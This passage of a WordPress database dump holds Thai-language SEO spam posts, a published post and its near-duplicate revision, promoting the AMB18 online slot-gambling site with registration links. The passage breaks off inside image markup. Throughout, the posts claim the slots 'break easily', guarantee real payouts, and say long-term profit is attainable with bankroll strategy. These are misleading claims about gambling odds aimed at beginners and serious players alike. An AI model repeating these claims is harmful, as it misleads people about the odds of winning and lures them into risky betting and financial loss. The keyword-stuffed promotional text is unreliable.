ตรง แตก ง่าย ล่าสุด</strong> เว็บดีมีคุณภาพรวมเกมดังระดับโลก โบนัสแตก เล่นสบาย ระบบลื่น จ่ายจริงทุกยอดถอน อัปเดตใหม่ปีนี้แน่นอนว่าเป็นโลกของสายปั่นยุคใหม่ไม่เหมือนเดิมอีกต่อไป เพราะผู้เล่นต้องการมากกว่าแค่ภาพสวยหรือเอฟเฟกต์จัดเต็ม แต่ต้องการระบบที่ลื่นไหล ปลอดภัย และให้ผลตอบแทนคุ้มค่า <a href=\"http://amb18slot.com\"><strong>AMB18</strong></a> จึงกลายเป็นตัวเลือกที่ถูกพูดถึงในกลุ่มนักเดิมพันออนไลน์ ด้วยจุดเด่นเรื่องเกมลิขสิทธิ์แท้ ระบบเสถียรและโบนัสที่แจกแบบไม่มีกั๊ก บรรยากาศการเล่นถูกออกแบบมาให้เข้าถึงง่ายมือใหม่เข้าใจได้ไม่ยาก ส่วนสายโปรก็สามารถวางแผนเดิมพันได้แบบจริงจัง ทุกองค์ประกอบถูกพัฒนาให้ตอบโจทย์ทั้งความสนุกและโอกาสทำกำไรในระยะยาว ใครที่กำลังมองหาเว็บที่ครบเครื่องทั้งความมันส์และความคุ้มบอกเลยว่าที่นี่ตอบโจทย์ครบทุกมิติ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>เว็บ ตรง แตก ง่าย ล่าสุด แหล่งรวมเกมแบรนด์แท้ เว็บ สล็อต แตก ง่าย อันดับ 1 แตก หนัก ต่าง ประเทศ</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>ถ้าพูดถึงการรวมค่ายเกมระดับอินเตอร์ <strong> เว็บ สล็อต แตก ง่าย อันดับ 1 แตก หนัก ต่าง ประเทศ</strong> ถือว่าโดดเด่นในเรื่องความหลากหลาย เกมทั้งหมดเป็นแบรนด์แท้จากผู้พัฒนาชื่อดังที่ได้รับการยอมรับในตลาดต่างประเทศ ระบบหลังบ้านมีมาตรฐานความปลอดภัยสูง ทำให้ผู้เล่นมั่นใจได้ว่าทุกการหมุนมีความโปร่งใส ไม่ใช่เว็บลอกหรือดัดแปลงตัวเกมให้เสียสมดุล จุดแข็งอีกอย่างคืออัตราการจ่ายที่ค่อนข้างสูง หลายเกมมีค่า RTP อยู่ในระดับที่น่าสนใจ ส่งผลให้โอกาสแตกหนักมีให้เห็นจริง สำหรับใครที่ชอบฟีลเกมต่างประเทศ ภาพสวย ธีมชัด ฟีเจอร์จัดเต็ม ที่นี่คือศูนย์รวมที่ตอบโจทย์ครบทั้งสายชิลและสายลุย</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>เว็บ ตรง แตก ง่าย ล่าสุด สุดยอด เว็บดีคุณภาพ ที่มาพร้อมค่ายเกมเบอร์ต้น ๆ ระดับเอเชีย </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>ความแข็งแกร่งของ <strong>เว็บ ตรง แตก ง่าย ล่าสุด</strong> ไม่ได้มีแค่เกมฝั่งยุโรปหรืออเมริกาเท่านั้น แต่ยังรวบรวมค่ายเกมเบอร์ต้นของเอเชียที่ได้รับความนิยมสูงถือว่าเป็นเว็บดีที่น่าสนใจอีกเว็บที่มาพร้อมระบบกราฟิกมีความละเอียด ภาพคม สีสด เสียงประกอบเร้าอารมณ์ ทำให้ทุกการหมุนมีชีวิตชีวา จุดเด่นคือการออกแบบฟีเจอร์ที่เข้าใจพฤติกรรมผู้เล่นในภูมิภาคนี้ ไม่ว่าจะเป็นโบนัสสะสม ตัวคูณรางวัล หรือสัญลักษณ์พิเศษที่เพิ่มโอกาสทำกำไร ทุกค่ายผ่านการคัดสรรอย่างพิถีพิถัน จึงมั่นใจได้ว่าเกมที่เปิดให้บริการมีคุณภาพจริงไม่มีเกมเกรดรองปะปน ใครที่อยากสัมผัสมาตรฐานระดับเอเชียแบบครบเครื่องเว็บนี้คือคำตอบที่ลงตัว</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>เว็บ ตรง แตก ง่าย ล่าสุด ค่าย Pragmatic Play รวมสุดยอดสล็อต มาตรฐานระดับโลก </strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>เมื่อพูดถึงค่ายระดับโลกอย่าง Pragmatic Play หลายคนย่อมคุ้นชื่อกันดีเพราะว่าทางเว็บได้นำเกมยอดฮิตจากค่ายนี้มาให้เลือกครบแทบทุกแนว ไม่ว่าจะเป็นธีมผจญภัย แฟนตาซี หรือแนวคลาสสิก จุดเด่นของค่ายนี้คือระบบตัวคูณที่เพิ่มความตื่นเต้นทุกครั้งที่วงล้อเรียงสัญลักษณ์ได้ตามเงื่อนไข อีกทั้งยังมีฟีเจอร์ฟรีสปินที่เปิดโอกาสให้ผู้เล่นลุ้นรางวัลใหญ่โดยไม่ต้องเพิ่มทุนมากเกินไป มาตรฐานเกมถูกพัฒนาอย่างต่อเนื่อง ทำให้ประสบการณ์เล่นมีความลื่นไหล และรองรับทั้งมือถือและคอมพิวเตอร์แบบไม่มีสะดุด</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>ค่าย Play’n GO ปั่นสนุก จ่ายจริง ทุกจังหวะ </strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>อีกหนึ่งค่ายที่สร้างชื่อในวงการสล็อตคือ Play\'n GO ซึ่งขึ้นชื่อเรื่องการออกแบบเกมที่มีเอกลักษณ์ ภาพสวย และเนื้อเรื่องชัดเจน เกมจากค่ายนี้ในระบบของเว็บถูกปรับให้เหมาะกับผู้เล่นไทย โหลดเร็ว ไม่กินทรัพยากรเครื่องมาก จุดแข็งคือระบบโบนัสที่แจกแบบมีชั้นเชิง บางเกมมีฟีเจอร์รีสปินหรือสัญลักษณ์พิเศษที่เพิ่มอัตราการจ่าย ทำให้ทุกจังหวะการหมุนมีโอกาสพลิกสถานการณ์ได้เสมอ ใครที่ชอบเกมที่มีความสร้างสรรค์สูง และมีความท้าทายด้านกลยุทธ์ ค่ายนี้ตอบโจทย์แบบครบเครื่อง</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>ค่าย Relax Gaming แล้วคุณจะรู้ว่าความพิเศษคืออะไร</strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>สำหรับสายที่มองหาอะไรแตกต่าง Relax Gaming คืออีกตัวเลือกที่ไม่ควรมองข้าม เกมของค่ายนี้มีดีไซน์ทันสมัย พร้อมกลไกพิเศษที่ไม่เหมือนใคร หลายเกมใช้ระบบ Megaways หรือฟีเจอร์ผสมผสานที่เพิ่มความหลากหลายของเพย์ไลน์ ทำให้รูปแบบการจ่ายรางวัลมีมิติและคาดเดายากยิ่งเพิ่มความลุ้นในทุกการหมุนในการเข้าเล่น</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>สล็อตแตกง่าย ล่าสุด เกมแห่งความสนุก โบนัสแตก ที่สายปั่นควรลองเล่น</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>เมื่อรวมค่ายดังระดับโลกและเอเชียเข้าไว้ด้วยกัน <strong>สล็อตแตกง่าย ล่าสุด</strong> จึงเต็มไปด้วยเกมคุณภาพที่มีจุดขายชัดเจนทั้งในเรื่องโบนัสแตกง่ายและฟีเจอร์เสริมที่ช่วยเพิ่มโอกาสรับรางวัล ผู้เล่นสามารถเลือกแนวเกมได้ตามสไตล์ไม่ว่าจะเป็นธีมตะวันตก แนวผจญภัย หรือธีมจีนยอดนิยม ทุกเกมถูกคัดมาเพราะมีสถิติการจ่ายดีและได้รับเสียงตอบรับจากผู้เล่นจำนวนมาก ใครที่กำลังมองหาเกมปั่นมันส์ระบบเสถียรและมีโอกาสทำกำไรสูง ที่นี่มีตัวเลือกครบให้ลองแบบจุใจ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>เกม Wild Bandito </strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>เป็นเกมธีมตะวันตกที่โดดเด่นด้วยภาพสีสันสดและตัวละครคาแรกเตอร์ชัดเจน จุดขายสำคัญคือฟีเจอร์ฟรีสปินพร้อมตัวคูณที่เพิ่มขึ้นตามจำนวนสัญลักษณ์พิเศษที่ปรากฏ ทำให้โอกาสรับรางวัลใหญ่มีความเป็นไปได้สูง เกมนี้เหมาะกับสายที่ชอบความดุดันและจังหวะลุ้นหนัก เพราะทุกการหมุนสามารถเปลี่ยนทุนเล็กให้กลายเป็นกำไรก้อนโตได้ หากบริหารเงินดีและเลือกจังหวะเข้าซื้อฟรีสปินอย่างเหมาะสม โอกาสแตกหนักมีให้เห็นบ่อย</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>เกม Wild North </strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>มาในธีมแดนหนาวที่เต็มไปด้วยสัตว์ป่าและบรรยากาศหิมะขาว จุดเด่นคือสัญลักษณ์ไวด์ที่สามารถขยายเต็มรีล เพิ่มโอกาสเรียงสัญลักษณ์ชนะได้ง่ายขึ้น เกมนี้มีความผันผวนระดับกลางถึงสูง เหมาะกับผู้เล่นที่ต้องการลุ้นรางวัลก้อนใหญ่ในรอบโบนัส ฟีเจอร์ฟรีสปินช่วยเพิ่มความเร้าใจ เพราะเมื่อเข้าโหมดนี้แล้วอัตราการจ่ายมีแนวโน้มสูงขึ้นอย่างเห็นได้ชัด ถือเป็นอีกเกมที่สายปั่นจริงจังควรลองสัมผัส</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>เกม Double Fortune</strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>เป็นเกมสล็อตธีมจีนที่ได้รับความนิยมสูง จุดแข็งคือระบบตัวคูณสองเท่าเมื่อเข้าโหมดพิเศษ ทำให้เงินรางวัลเพิ่มขึ้นแบบชัดเจน การออกแบบเกมเน้นความเรียบง่าย เข้าใจง่าย มือใหม่สามารถเล่นได้ไม่ซับซ้อน ขณะเดียวกันก็มีศักยภาพในการจ่ายสูงหากสัญลักษณ์เรียงครบตามเงื่อนไข เหมาะกับสายที่ชอบเกมจังหวะไม่เร็วเกินไป แต่มีโอกาสรับรางวัลคุ้มค่าในแต่ละรอบ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>สล็อตล่าสุด เอาชนะได้ง่าย ด้วยฟรีสปินที่ซื้อได้ พร้อมระบบไวด์ที่ จ่ายจริง</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>อีกหนึ่งจุดแข็งของ <strong>สล็อตล่าสุด </strong>คือระบบซื้อฟรีสปินที่เปิดโอกาสให้ผู้เล่นเข้าสู่รอบโบนัสได้โดยไม่ต้องรอสัญลักษณ์ครบตามเงื่อนไขฟีเจอร์นี้ช่วยประหยัดเวลาและเพิ่มโอกาสลุ้นรางวัลใหญ่แบบตรงจุด นอกจากนี้ยังมีระบบไวด์ที่ทำหน้าที่แทนสัญลักษณ์อื่นช่วยให้การเรียงสัญลักษณ์ชนะเกิดขึ้นง่ายขึ้น หลายเกมยังมีไวด์แบบขยายรีลหรือไวด์คูณ ทำให้การจ่ายรางวัลมีมูลค่าสูงกว่าเดิมรับรองว่าจ่ายจริง หากใช้กลยุทธ์บริหารทุนควบคู่กันไปการเอาชนะและทำกำไรระยะยาวไม่ใช่เรื่องไกลเกินจริง เลือก <a href=\"https://luca333auto.com/auth/register\"><strong>สมัคร</strong></a> เข้าเล่นที่นี่รับรองว่ามีแต่คุ้มกับคุ้มอย่างแน่นอน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>เว็บตรงแตกง่ายล่าสุด เปิดให้ เล่นสบาย มาพร้อมโหมดให้ทดลองเล่นฟรี ก่อนเปิดสกิลเดิมพันจริง</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>สำหรับผู้เล่นที่ยังไม่มั่นใจในแนวทางการวางแผน <strong>เว็บตรงแตกง่ายล่าสุด</strong> เปิดโหมดทดลองเล่นฟรีให้ใช้งานก่อนลงเงินจริงเพิ่มโอกาสในการเข้าเล่นสามารถที่จะเล่นสบายได้ทุกรอบ ผู้เล่นสามารถเรียนรู้กลไกเกมทดลองฟีเจอร์ และสังเกตจังหวะการจ่ายได้โดยไม่ต้องเสี่ยงทุนจริง โหมดนี้เหมาะมากกับมือใหม่ที่ต้องการฝึกสกิล รวมถึงสายโปรที่อยากทดสอบเกมใหม่ก่อนลงทุน เมื่อเข้าใจรูปแบบการเล่นแล้วค่อยปรับกลยุทธ์ให้เหมาะสมกับงบประมาณของตัวเอง การมีตัวเลือกทดลองเล่นจึงช่วยเพิ่มความมั่นใจและลดความเสี่ยงได้อย่างชัดเจนทำให้ทุกการเดิมพันมีความพร้อมมากยิ่งขึ้น</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','AMB18 สล็อต เว็บ ตรง แตก ง่าย ล่าสุด เว็บดีโบนัสแตกเล่นสบายจ่ายจริง','','publish','closed','closed','','slot-direct-website-goodweb-bonus','','','2026-03-02 08:29:41','2026-03-02 08:29:41','',0,'https://amb18slot.com/?p=414',0,'post','',0),(415,3,'2026-02-26 19:34:09','2026-02-26 19:34:09','<!-- wp:image {\"id\":370,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-direct-website-goodweb-bonus-AMB18-1024x512.webp\" alt=\"สล็อต เว็บ ตรง แตก ง่าย ล่าสุด\" class=\"wp-image-370\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p><strong>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด</strong> เว็บดีมีคุณภาพรวมเกมดังระดับโลก โบนัสแตก เล่นสบาย ระบบลื่น จ่ายจริงทุกยอดถอน อัปเดตใหม่ปีนี้แน่นอนว่าเป็นโลกของสายปั่นยุคใหม่ไม่เหมือนเดิมอีกต่อไป เพราะผู้เล่นต้องการมากกว่าแค่ภาพสวยหรือเอฟเฟกต์จัดเต็ม แต่ต้องการระบบที่ลื่นไหล ปลอดภัย และให้ผลตอบแทนคุ้มค่า <a href=\"http://amb18slot.com\"><strong>AMB18</strong></a> จึงกลายเป็นตัวเลือกที่ถูกพูดถึงในกลุ่มนักเดิมพันออนไลน์ ด้วยจุดเด่นเรื่องเกมลิขสิทธิ์แท้ ระบบเสถียรและโบนัสที่แจกแบบไม่มีกั๊ก บรรยากาศการเล่นถูกออกแบบมาให้เข้าถึงง่ายมือใหม่เข้าใจได้ไม่ยาก ส่วนสายโปรก็สามารถวางแผนเดิมพันได้แบบจริงจัง ทุกองค์ประกอบถูกพัฒนาให้ตอบโจทย์ทั้งความสนุกและโอกาสทำกำไรในระยะยาว ใครที่กำลังมองหาเว็บที่ครบเครื่องทั้งความมันส์และความคุ้มบอกเลยว่าที่นี่ตอบโจทย์ครบทุกมิติ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด </strong><strong>แหล่งรวมเกมแบรนด์แท้ เว็บ สล็อต แตก ง่าย อันดับ 1 แตก หนัก ต่าง ประเทศ</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>ถ้าพูดถึงการรวมค่ายเกมระดับอินเตอร์ <strong> เว็บ สล็อต แตก ง่าย อันดับ 1 แตก หนัก ต่าง ประเทศ</strong> ถือว่าโดดเด่นในเรื่องความหลากหลาย เกมทั้งหมดเป็นแบรนด์แท้จากผู้พัฒนาชื่อดังที่ได้รับการยอมรับในตลาดต่างประเทศ ระบบหลังบ้านมีมาตรฐานความปลอดภัยสูง ทำให้ผู้เล่นมั่นใจได้ว่าทุกการหมุนมีความโปร่งใส ไม่ใช่เว็บลอกหรือดัดแปลงตัวเกมให้เสียสมดุล จุดแข็งอีกอย่างคืออัตราการจ่ายที่ค่อนข้างสูง หลายเกมมีค่า RTP อยู่ในระดับที่น่าสนใจ ส่งผลให้โอกาสแตกหนักมีให้เห็นจริง สำหรับใครที่ชอบฟีลเกมต่างประเทศ ภาพสวย ธีมชัด ฟีเจอร์จัดเต็ม ที่นี่คือศูนย์รวมที่ตอบโจทย์ครบทั้งสายชิลและสายลุย</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด </strong><strong>สุดยอด </strong><strong>เว็บดี</strong><strong> คุณภาพ ที่มาพร้อมค่ายเกมเบอร์ต้น ๆ ระดับเอเชีย </strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>ความแข็งแกร่งของ <strong>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด</strong> ไม่ได้มีแค่เกมฝั่งยุโรปหรืออเมริกาเท่านั้น แต่ยังรวบรวมค่ายเกมเบอร์ต้นของเอเชียที่ได้รับความนิยมสูงถือว่าเป็นเว็บดีที่น่าสนใจอีกเว็บที่มาพร้อมระบบกราฟิกมีความละเอียด ภาพคม สีสด เสียงประกอบเร้าอารมณ์ ทำให้ทุกการหมุนมีชีวิตชีวา จุดเด่นคือการออกแบบฟีเจอร์ที่เข้าใจพฤติกรรมผู้เล่นในภูมิภาคนี้ ไม่ว่าจะเป็นโบนัสสะสม ตัวคูณรางวัล หรือสัญลักษณ์พิเศษที่เพิ่มโอกาสทำกำไร ทุกค่ายผ่านการคัดสรรอย่างพิถีพิถัน จึงมั่นใจได้ว่าเกมที่เปิดให้บริการมีคุณภาพจริงไม่มีเกมเกรดรองปะปน ใครที่อยากสัมผัสมาตรฐานระดับเอเชียแบบครบเครื่องเว็บนี้คือคำตอบที่ลงตัว</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด </strong><strong>ค่าย Pragmatic Play รวมสุดยอดสล็อต มาตรฐานระดับโลก </strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>เมื่อพูดถึงค่ายระดับโลกอย่าง Pragmatic Play หลายคนย่อมคุ้นชื่อกันดีเพราะว่าทางเว็บได้นำเกมยอดฮิตจากค่ายนี้มาให้เลือกครบแทบทุกแนว ไม่ว่าจะเป็นธีมผจญภัย แฟนตาซี หรือแนวคลาสสิก จุดเด่นของค่ายนี้คือระบบตัวคูณที่เพิ่มความตื่นเต้นทุกครั้งที่วงล้อเรียงสัญลักษณ์ได้ตามเงื่อนไข อีกทั้งยังมีฟีเจอร์ฟรีสปินที่เปิดโอกาสให้ผู้เล่นลุ้นรางวัลใหญ่โดยไม่ต้องเพิ่มทุนมากเกินไป มาตรฐานเกมถูกพัฒนาอย่างต่อเนื่อง ทำให้ประสบการณ์เล่นมีความลื่นไหล และรองรับทั้งมือถือและคอมพิวเตอร์แบบไม่มีสะดุด</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>ค่าย Play’n GO ปั่นสนุก จ่ายจริง ทุกจังหวะ </strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>อีกหนึ่งค่ายที่สร้างชื่อในวงการสล็อตคือ Play\'n GO ซึ่งขึ้นชื่อเรื่องการออกแบบเกมที่มีเอกลักษณ์ ภาพสวย และเนื้อเรื่องชัดเจน เกมจากค่ายนี้ในระบบของเว็บถูกปรับให้เหมาะกับผู้เล่นไทย โหลดเร็ว ไม่กินทรัพยากรเครื่องมาก จุดแข็งคือระบบโบนัสที่แจกแบบมีชั้นเชิง บางเกมมีฟีเจอร์รีสปินหรือสัญลักษณ์พิเศษที่เพิ่มอัตราการจ่าย ทำให้ทุกจังหวะการหมุนมีโอกาสพลิกสถานการณ์ได้เสมอ ใครที่ชอบเกมที่มีความสร้างสรรค์สูง และมีความท้าทายด้านกลยุทธ์ ค่ายนี้ตอบโจทย์แบบครบเครื่อง</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>ค่าย Relax Gaming แล้วคุณจะรู้ว่าความพิเศษคืออะไร</strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>สำหรับสายที่มองหาอะไรแตกต่าง Relax Gaming คืออีกตัวเลือกที่ไม่ควรมองข้าม เกมของค่ายนี้มีดีไซน์ทันสมัย พร้อมกลไกพิเศษที่ไม่เหมือนใคร หลายเกมใช้ระบบ Megaways หรือฟีเจอร์ผสมผสานที่เพิ่มความหลากหลายของเพย์ไลน์ ทำให้รูปแบบการจ่ายรางวัลมีมิติและคาดเดายากยิ่งเพิ่มความลุ้นในทุกการหมุนในการเข้าเล่น</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด </strong><strong>เกมแห่งความสนุก </strong><strong>โบนัสแตก </strong><strong>ที่สายปั่นควรลองเล่น</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>เมื่อรวมค่ายดังระดับโลกและเอเชียเข้าไว้ด้วยกัน <strong>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด</strong> จึงเต็มไปด้วยเกมคุณภาพที่มีจุดขายชัดเจนทั้งในเรื่องโบนัสแตกง่ายและฟีเจอร์เสริมที่ช่วยเพิ่มโอกาสรับรางวัล ผู้เล่นสามารถเลือกแนวเกมได้ตามสไตล์ไม่ว่าจะเป็นธีมตะวันตก แนวผจญภัย หรือธีมจีนยอดนิยม ทุกเกมถูกคัดมาเพราะมีสถิติการจ่ายดีและได้รับเสียงตอบรับจากผู้เล่นจำนวนมาก ใครที่กำลังมองหาเกมปั่นมันส์ระบบเสถียรและมีโอกาสทำกำไรสูง ที่นี่มีตัวเลือกครบให้ลองแบบจุใจ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>เกม Wild Bandito </strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>เป็นเกมธีมตะวันตกที่โดดเด่นด้วยภาพสีสันสดและตัวละครคาแรกเตอร์ชัดเจน จุดขายสำคัญคือฟีเจอร์ฟรีสปินพร้อมตัวคูณที่เพิ่มขึ้นตามจำนวนสัญลักษณ์พิเศษที่ปรากฏ ทำให้โอกาสรับรางวัลใหญ่มีความเป็นไปได้สูง เกมนี้เหมาะกับสายที่ชอบความดุดันและจังหวะลุ้นหนัก เพราะทุกการหมุนสามารถเปลี่ยนทุนเล็กให้กลายเป็นกำไรก้อนโตได้ หากบริหารเงินดีและเลือกจังหวะเข้าซื้อฟรีสปินอย่างเหมาะสม โอกาสแตกหนักมีให้เห็นบ่อย</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>เกม Wild North </strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>มาในธีมแดนหนาวที่เต็มไปด้วยสัตว์ป่าและบรรยากาศหิมะขาว จุดเด่นคือสัญลักษณ์ไวด์ที่สามารถขยายเต็มรีล เพิ่มโอกาสเรียงสัญลักษณ์ชนะได้ง่ายขึ้น เกมนี้มีความผันผวนระดับกลางถึงสูง เหมาะกับผู้เล่นที่ต้องการลุ้นรางวัลก้อนใหญ่ในรอบโบนัส ฟีเจอร์ฟรีสปินช่วยเพิ่มความเร้าใจ เพราะเมื่อเข้าโหมดนี้แล้วอัตราการจ่ายมีแนวโน้มสูงขึ้นอย่างเห็นได้ชัด ถือเป็นอีกเกมที่สายปั่นจริงจังควรลองสัมผัส</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading {\"level\":3} -->\n<h3 class=\"wp-block-heading\"><strong>เกม Double Fortune</strong></h3>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>เป็นเกมสล็อตธีมจีนที่ได้รับความนิยมสูง จุดแข็งคือระบบตัวคูณสองเท่าเมื่อเข้าโหมดพิเศษ ทำให้เงินรางวัลเพิ่มขึ้นแบบชัดเจน การออกแบบเกมเน้นความเรียบง่าย เข้าใจง่าย มือใหม่สามารถเล่นได้ไม่ซับซ้อน ขณะเดียวกันก็มีศักยภาพในการจ่ายสูงหากสัญลักษณ์เรียงครบตามเงื่อนไข เหมาะกับสายที่ชอบเกมจังหวะไม่เร็วเกินไป แต่มีโอกาสรับรางวัลคุ้มค่าในแต่ละรอบ</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด </strong><strong>เอาชนะได้ง่าย ด้วยฟรีสปินที่ซื้อได้ พร้อมระบบไวด์ที่ </strong><strong>จ่ายจริง</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>อีกหนึ่งจุดแข็งของ <strong>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด </strong>คือระบบซื้อฟรีสปินที่เปิดโอกาสให้ผู้เล่นเข้าสู่รอบโบนัสได้โดยไม่ต้องรอสัญลักษณ์ครบตามเงื่อนไขฟีเจอร์นี้ช่วยประหยัดเวลาและเพิ่มโอกาสลุ้นรางวัลใหญ่แบบตรงจุด นอกจากนี้ยังมีระบบไวด์ที่ทำหน้าที่แทนสัญลักษณ์อื่นช่วยให้การเรียงสัญลักษณ์ชนะเกิดขึ้นง่ายขึ้น หลายเกมยังมีไวด์แบบขยายรีลหรือไวด์คูณ ทำให้การจ่ายรางวัลมีมูลค่าสูงกว่าเดิมรับรองว่าจ่ายจริง หากใช้กลยุทธ์บริหารทุนควบคู่กันไปการเอาชนะและทำกำไรระยะยาวไม่ใช่เรื่องไกลเกินจริง เลือก <a href=\"https://luca333auto.com/auth/register\"><strong>สมัคร</strong></a> เข้าเล่นที่นี่รับรองว่ามีแต่คุ้มกับคุ้มอย่างแน่นอน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:heading -->\n<h2 class=\"wp-block-heading\"><strong>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด </strong><strong>เปิดให้ </strong><strong>เล่นสบาย </strong><strong>มาพร้อมโหมดให้ทดลองเล่นฟรี ก่อนเปิดสกิลเดิมพันจริง</strong></h2>\n<!-- /wp:heading -->\n\n<!-- wp:paragraph -->\n<p>สำหรับผู้เล่นที่ยังไม่มั่นใจในแนวทางการวางแผน <strong>สล็อต เว็บ ตรง แตก ง่าย ล่าสุด</strong> เปิดโหมดทดลองเล่นฟรีให้ใช้งานก่อนลงเงินจริงเพิ่มโอกาสในการเข้าเล่นสามารถที่จะเล่นสบายได้ทุกรอบ ผู้เล่นสามารถเรียนรู้กลไกเกมทดลองฟีเจอร์ และสังเกตจังหวะการจ่ายได้โดยไม่ต้องเสี่ยงทุนจริง โหมดนี้เหมาะมากกับมือใหม่ที่ต้องการฝึกสกิล รวมถึงสายโปรที่อยากทดสอบเกมใหม่ก่อนลงทุน เมื่อเข้าใจรูปแบบการเล่นแล้วค่อยปรับกลยุทธ์ให้เหมาะสมกับงบประมาณของตัวเอง การมีตัวเลือกทดลองเล่นจึงช่วยเพิ่มความมั่นใจและลดความเสี่ยงได้อย่างชัดเจนทำให้ทุกการเดิมพันมีความพร้อมมากยิ่งขึ้น</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','AMB18 สล็อต เว็บ ตรง แตก ง่าย ล่าสุด เว็บดีโบนัสแตกเล่นสบายจ่ายจริง','','inherit','closed','closed','','414-revision-v1','','','2026-02-26 19:34:09','2026-02-26 19:34:09','',414,'https://amb18slot.com/?p=415',0,'revision','',0),(416,3,'2026-03-02 08:28:29','2026-03-02 08:28:29','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-AMB18-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-AMB18-768x768.webp 768w\" 